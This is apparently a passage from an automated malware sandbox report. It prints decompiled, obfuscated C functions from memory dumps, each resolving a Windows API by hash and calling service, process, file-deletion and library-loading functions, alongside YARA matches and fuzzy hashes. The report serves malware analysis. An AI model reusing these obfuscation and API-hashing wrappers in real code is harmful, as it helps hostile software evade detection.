                                              				_v12 = _v12 ^ 0xd1b2fb7e;
                                              				_v8 = 0x629e;
                                              				_v8 = _v8 + 0xfffff5da;
                                              				_v8 = _v8 | 0xbef7b77b;
                                              				_v8 = _v8 ^ 0xbef79fc3;
                                              				E002B07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                              				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                              				return _t28;
                                              			}










                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002A87F2,0000CAAE,0000510C,AD82F196), ref: 002B989B
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction ID: 77a7ed60376960677dfcd9edda5bb1d35bd25666ffbf56bdbd588131818d1c5c
                                              • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction Fuzzy Hash: 0F019A72801208FBDB04EFE5DC46CDFBF79EF85350F108188F918A6220E6715B619BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 62%
                                              			E002B7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t24;
                                              				int _t31;
                                              				signed int _t33;
                                              				struct _SHFILEOPSTRUCTW* _t40;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a12);
                                              				_t40 = __ecx;
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E002A602B(_t24);
                                              				_v8 = 0xa117;
                                              				_t33 = 0x76;
                                              				_v8 = _v8 / _t33;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 ^ 0x210fe703;
                                              				_v8 = _v8 ^ 0x210fdcea;
                                              				_v12 = 0xf1e9;
                                              				_v12 = _v12 << 9;
                                              				_v12 = _v12 ^ 0x01e3a445;
                                              				E002B07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                              				_t31 = SHFileOperationW(_t40); // executed
                                              				return _t31;
                                              			}










                                              APIs
                                              • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 002B7C67
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileOperation
                                              • String ID:
                                              • API String ID: 3080627654-0
                                              • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction ID: e675540ff699216bacb546952c39e2567fb1d027674569978ea920fce27eee46
                                              • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction Fuzzy Hash: 7A014FB190120CFFEB09DFA4C84A8DEBBB5EF45314F108198F50567240EBB15F609B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 52%
                                              			E002AF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t24;
                                              				void* _t29;
                                              				int _t35;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a20);
                                              				_t35 = __ecx;
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E002A602B(_t24);
                                              				_v12 = 0xd5a7;
                                              				_v12 = _v12 ^ 0x994cba9d;
                                              				_v12 = _v12 ^ 0x994c19d3;
                                              				_v8 = 0xac88;
                                              				_v8 = _v8 << 3;
                                              				_v8 = _v8 >> 8;
                                              				_v8 = _v8 + 0xebed;
                                              				_v8 = _v8 ^ 0x0000ab82;
                                              				E002B07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                              				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                              				return _t29;
                                              			}









                                              APIs
                                              • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 002AF6D8
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: OpenService
                                              • String ID:
                                              • API String ID: 3098006287-0
                                              • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction ID: b0446ff2d6295519c73a3ca86446cb3658931a0c82ef6f51e52b865abbf4dc43
                                              • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction Fuzzy Hash: A401E5B6901208BBEF059F94DC4A8DFBF75EB05364F148188F91462250D6B25E61EBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E002AB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				void* _t23;
                                              				intOrPtr* _t27;
                                              				void* _t28;
                                              
                                              				E002A602B(_t23);
                                              				_v12 = 0x9431;
                                              				_v12 = _v12 >> 7;
                                              				_v12 = _v12 ^ 0x0000160f;
                                              				_v8 = 0xc972;
                                              				_v8 = _v8 ^ 0x829e0126;
                                              				_v8 = _v8 + 0x4512;
                                              				_v8 = _v8 + 0xffff18f9;
                                              				_v8 = _v8 ^ 0x829e24c1;
                                              				_t27 = E002B07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                              				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                              				return _t28;
                                              			}









                                              APIs
                                              • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 002AB759
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileHandleInformation
                                              • String ID:
                                              • API String ID: 3935143524-0
                                              • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction ID: c51acb9c0946fd456ff27fcbf4487c317e9e481283019b4def1c4b94d8651493
                                              • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction Fuzzy Hash: 2E018FB194030CFBEF45DF90DD06E9EBBB5EF04704F108188FA0526190D7B15E20AB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E002BAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				void* _t21;
                                              				int _t27;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E002A602B(_t21);
                                              				_v12 = 0xcc49;
                                              				_v12 = _v12 << 6;
                                              				_v12 = _v12 >> 2;
                                              				_v12 = _v12 ^ 0x000ca988;
                                              				_v8 = 0x5d85;
                                              				_v8 = _v8 | 0xb9d19a55;
                                              				_v8 = _v8 * 0xd;
                                              				_v8 = _v8 ^ 0x6fa87272;
                                              				E002B07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                              				_t27 = DeleteFileW(_a12); // executed
                                              				return _t27;
                                              			}








                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 002BAAA8
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction ID: 7a2db7db2feef5d49288eb0af1dd66c3d059532745613c57d2bf4b73e80d59b0
                                              • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction Fuzzy Hash: F0F069B191020CFFDF08DFA4DD4A89EBFB4EB41304F108088F915A6250D7B29B649B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 70%
                                              			E002A5FB2(void* __ecx, void* __edx, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t21;
                                              				int _t27;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E002A602B(_t21);
                                              				_v12 = 0x33d;
                                              				_v12 = _v12 + 0xc3dc;
                                              				_v12 = _v12 | 0x39ccfb02;
                                              				_v12 = _v12 ^ 0x39ccf342;
                                              				_v8 = 0xe8d9;
                                              				_v8 = _v8 * 0x16;
                                              				_v8 = _v8 | 0x4145347f;
                                              				_v8 = _v8 ^ 0x9035ef96;
                                              				_v8 = _v8 ^ 0xd1609914;
                                              				E002B07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                              				_t27 = CloseServiceHandle(_a4); // executed
                                              				return _t27;
                                              			}








                                              APIs
                                              • CloseServiceHandle.ADVAPI32(39CCF342), ref: 002A6025
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleService
                                              • String ID:
                                              • API String ID: 1725840886-0
                                              • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction ID: 07bc0c155b8d99f6417d807771814c382b6b73a17356d2f2300d5d66583be093
                                              • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction Fuzzy Hash: F9F04FB0C11208FFDB08DFA0E94689EBFB8EB40340F208198E509A7260E7715F559F54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Executed Functions

                                              C-Code - Quality: 62%
                                              			E006C2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t30;
                                              				void* _t39;
                                              				signed int _t41;
                                              				signed int _t42;
                                              
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(0);
                                              				_push(0);
                                              				E006C602B(_t30);
                                              				_v12 = 0x5e3c;
                                              				_t41 = 0x63;
                                              				_v12 = _v12 / _t41;
                                              				_t42 = 0x2f;
                                              				_v12 = _v12 / _t42;
                                              				_v12 = _v12 ^ 0x000064be;
                                              				_v8 = 0x74da;
                                              				_v8 = _v8 | 0xfefeeaea;
                                              				_v8 = _v8 >> 0xc;
                                              				_v8 = _v8 ^ 0x000fb531;
                                              				E006D07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                              				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                              				return _t39;
                                              			}










                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 006C29DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ManagerOpen
                                              • String ID: <^
                                              • API String ID: 1889721586-3203995635
                                              • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction ID: 0d90814f6e3e98dddc946965e93f2e1c0a25011b10019f6726629396f8a684e9
                                              • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction Fuzzy Hash: 6A016D72A00108BFEB14DF95DC0A9DFBFB6EF44310F108089F508A6250D7B69F619B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E006CC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				void* _t29;
                                              				intOrPtr* _t33;
                                              				void* _t34;
                                              
                                              				E006C602B(_t29);
                                              				_v28 = 0x4fe02f;
                                              				_v24 = 0x232390;
                                              				_v20 = 0xf8460;
                                              				_v16 = 0;
                                              				_v12 = 0xf625;
                                              				_v12 = _v12 >> 6;
                                              				_v12 = _v12 >> 0xa;
                                              				_v12 = _v12 + 0xffffcc6f;
                                              				_v12 = _v12 ^ 0xffffa5b6;
                                              				_v8 = 0xe5cd;
                                              				_v8 = _v8 + 0xffffae4d;
                                              				_v8 = _v8 | 0xf8bbefe7;
                                              				_v8 = _v8 ^ 0xf8bbcc9a;
                                              				_t33 = E006D07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                              				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                              				return _t34;
                                              			}













                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 006CC762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: /O
                                              • API String ID: 1514166925-1923427199
                                              • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction ID: 7e0c757dfb255f1e9486b82fffa48cea1d3adc185dba1f33bdcace53b76a2b62
                                              • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction Fuzzy Hash: 391133B290122DBBCB25DF94DD498EFBFB9EF04714F108188F90966210D3B14B659BE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 82%
                                              			E006C1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				void* _t33;
                                              				struct HINSTANCE__* _t40;
                                              				signed int _t42;
                                              
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				E006C602B(_t33);
                                              				_v16 = _v16 & 0x00000000;
                                              				_v24 = 0x1b2eda;
                                              				_v20 = 0x33a3b7;
                                              				_v12 = 0x98c;
                                              				_v12 = _v12 + 0xb426;
                                              				_v12 = _v12 + 0x5beb;
                                              				_t42 = 0x63;
                                              				_v12 = _v12 / _t42;
                                              				_v12 = _v12 ^ 0x00000fce;
                                              				_v8 = 0x120e;
                                              				_v8 = _v8 + 0xfffffcb8;
                                              				_v8 = _v8 + 0xffffefaa;
                                              				_v8 = _v8 >> 5;
                                              				_v8 = _v8 ^ 0x07ff9a02;
                                              				E006D07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                              				_t40 = LoadLibraryW(_a12); // executed
                                              				return _t40;
                                              			}












                                              APIs
                                              • LoadLibraryW.KERNEL32(0033A3B7), ref: 006C1096
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: [
                                              • API String ID: 1029625771-3431493590
                                              • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction ID: 595082948c127377ca9c24a2aaf2efaa831d8029a0979ed7cd247bea10029107
                                              • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction Fuzzy Hash: C2015BB6D01309BBEF44DF94C94AADEBBB1EB54318F108188E41466291D3B19B649B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E006C4859() {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              
                                              				_v12 = 0xafe2;
                                              				_v12 = _v12 * 0x42;
                                              				_v12 = _v12 + 0xffffdd89;
                                              				_v12 = _v12 ^ 0x002d198d;
                                              				_v8 = 0x5b09;
                                              				_v8 = _v8 | 0xa1ea9544;
                                              				_v8 = _v8 * 0x12;
                                              				_v8 = _v8 ^ 0x6283d9c1;
                                              				E006D07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                              				ExitProcess(0);
                                              			}

                                              APIs
                                              • ExitProcess.KERNELBASE(00000000), ref: 006C48B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: [
                                              • API String ID: 621844428-1822564810
                                              • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction ID: f977ee72c49a2ce788bd0dd8ccf2a57d70dd6a84fe47d661be0c35e563bf7402
                                              • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction Fuzzy Hash: 66F01D70D05209FBDB44CFE8C95699EBFB5EB40301F20818DE444B7290E3B15F509B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 66%
                                              			E006D4F7D(void* __ecx, void* __edx, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t17;
                                              				int _t24;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E006C602B(_t17);
                                              				_v12 = 0xddd8;
                                              				_v12 = _v12 * 0x48;
                                              				_v12 = _v12 ^ 0x003e66d8;
                                              				_v8 = 0xcb35;
                                              				_v8 = _v8 ^ 0x7b88573c;
                                              				_v8 = _v8 * 0x59;
                                              				_v8 = _v8 ^ 0xf27e4a21;
                                              				E006D07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                              				_t24 = CloseHandle(_a4); // executed
                                              				return _t24;
                                              			}

                                              APIs
                                              • CloseHandle.KERNELBASE(003E66D8), ref: 006D4FE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: {#lm
                                              • API String ID: 2962429428-1564096886
                                              • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction ID: dc35befc03082ea648cf0aa4494a33d20af433371597595b82786401f99a50a2
                                              • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction Fuzzy Hash: 3BF037B0C1120CFFEB04DFA4DA4689EBFBAEB40300F20819DE808BB250D3715B509B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 21%
                                              			E006D976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t34;
                                              				int _t39;
                                              				struct _PROCESS_INFORMATION* _t48;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_t48 = __edx;
                                              				_push(0);
                                              				_push(_a68);
                                              				_push(0);
                                              				_push(_a60);
                                              				_push(_a56);
                                              				_push(_a52);
                                              				_push(0);
                                              				_push(_a44);
                                              				_push(_a40);
                                              				_push(0);
                                              				_push(0);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(_a20);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E006C602B(_t34);
                                              				_v12 = 0xaff9;
                                              				_v12 = _v12 | 0xcee54bd1;
                                              				_v12 = _v12 + 0x6ed6;
                                              				_v12 = _v12 ^ 0xcee61221;
                                              				_v8 = 0x6229;
                                              				_v8 = _v8 ^ 0x42aa9f31;
                                              				_v8 = _v8 >> 2;
                                              				_v8 = _v8 ^ 0x10aad83f;
                                              				E006D07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                              				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                              				return _t39;
                                              			}

                                              APIs
                                              • CreateProcessW.KERNEL32(006C591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,006C591A), ref: 006D9816
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction ID: 3f8e90123bad8e9db8c238fbfb71a36c04cb31a8b2b8d6f9f018623c35058772
                                              • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction Fuzzy Hash: 3011D372900148BBDF599F92DC0ACDF7F3AEF89750F104048FA1456120D2728A60EBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 31%
                                              			E006CB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t32;
                                              				void* _t38;
                                              				long _t47;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a48);
                                              				_t47 = __edx;
                                              				_push(_a44);
                                              				_push(_a40);
                                              				_push(_a36);
                                              				_push(_a32);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(0);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(0);
                                              				E006C602B(_t32);
                                              				_v8 = 0xfd14;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 * 0x7a;
                                              				_v8 = _v8 >> 9;
                                              				_v8 = _v8 ^ 0x00002bef;
                                              				_v12 = 0x4f26;
                                              				_v12 = _v12 | 0xe7e97f76;
                                              				_v12 = _v12 ^ 0xe7e94dbb;
                                              				E006D07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                              				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                              				return _t38;
                                              			}

                                              APIs
                                              • CreateFileW.KERNELBASE(006D0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,006D0668,?,?,?,?), ref: 006CB5FD
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction ID: 4dfd29d2e95c8a81270e188d170eef02627936aac4c261a76deba25f80d2271c
                                              • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction Fuzzy Hash: 8E11C372801248BBDF56DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 54%
                                              			E006D981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              				void* _t28;
                                              				void* _t34;
                                              				long _t37;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a16);
                                              				_t34 = __edx;
                                              				_t37 = __ecx;
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E006C602B(_t22);
                                              				_v12 = 0xe68;
                                              				_v12 = _v12 * 0x39;
                                              				_v12 = _v12 ^ 0xd1b1d871;
                                              				_v12 = _v12 ^ 0xd1b2fb7e;
                                              				_v8 = 0x629e;
                                              				_v8 = _v8 + 0xfffff5da;
                                              				_v8 = _v8 | 0xbef7b77b;
                                              				_v8 = _v8 ^ 0xbef79fc3;
                                              				E006D07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                              				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                              				return _t28;
                                              			}

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,006C87F2,0000CAAE,0000510C,AD82F196), ref: 006D989B
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction ID: bd96d7fd845bcf9acbec375f88614873cfd5b079acd079bb1ab1d14eab653b18
                                              • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction Fuzzy Hash: 98019A72801208FBDB04EFD5D846CDFBF79EF85310F10818DF908A6220E6719B219BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 62%
